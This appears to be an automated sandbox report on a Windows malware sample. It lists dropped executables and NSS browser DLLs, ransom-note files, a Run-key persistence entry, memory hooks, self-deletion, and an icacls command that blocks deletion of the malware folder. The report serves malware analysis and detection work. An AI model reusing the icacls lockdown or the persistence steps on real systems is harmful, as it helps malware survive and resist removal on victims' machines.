Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00D2E103 push ecx; retf 0_2_00D2E105
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00D2E139 push 4843A5D1h; retf 0_2_00D2E145
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004026D2 push ebx; ret 6_2_004026EA
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004026ED pushad ; ret 6_2_004026F4
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004026F7 push ebx; ret 6_2_00402714
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_00402745 push edi; ret 6_2_0040276D
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_0040273B push edi; ret 6_2_00402742
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_00402595 push ss; ret 6_2_0040259C
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004027BB push edi; ret 6_2_0040276D
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_00C72822 push edi; ret 6_2_00C727D4

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DB15.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A0B.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlm[1].dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\71C9.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gtdirat Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gtdirat Jump to dropped file
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe File created: C:\Users\user\_README.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File created: C:\$WinREAgent\_README.txt
Source: C:\Users\user\AppData\Local\Temp\DB15.exe File created: C:\$WinREAgent\Scratch\_README.txt
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\6uvlpqsj4e.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\gtdirat:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 1420005 value: E9 2B BA F2 75
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 7734BA30 value: E9 DA 45 0D 8A
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 1430008 value: E9 8B 8E F6 75
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 77398E90 value: E9 80 71 09 8A
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 2CE0005 value: E9 8B 4D C5 73
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 76934D90 value: E9 7A B2 3A 8C
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 2D00005 value: E9 EB EB C4 73
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 7694EBF0 value: E9 1A 14 3B 8C
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 2D10005 value: E9 8B 8A C1 72
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 75928A90 value: E9 7A 75 3E 8D
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 2D20005 value: E9 2B 02 C3 72
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Memory written: PID: 5352 base: 75950230 value: E9 DA FD 3C 8D
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_00403CF1 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 11_2_00403CF1
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\71C9.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
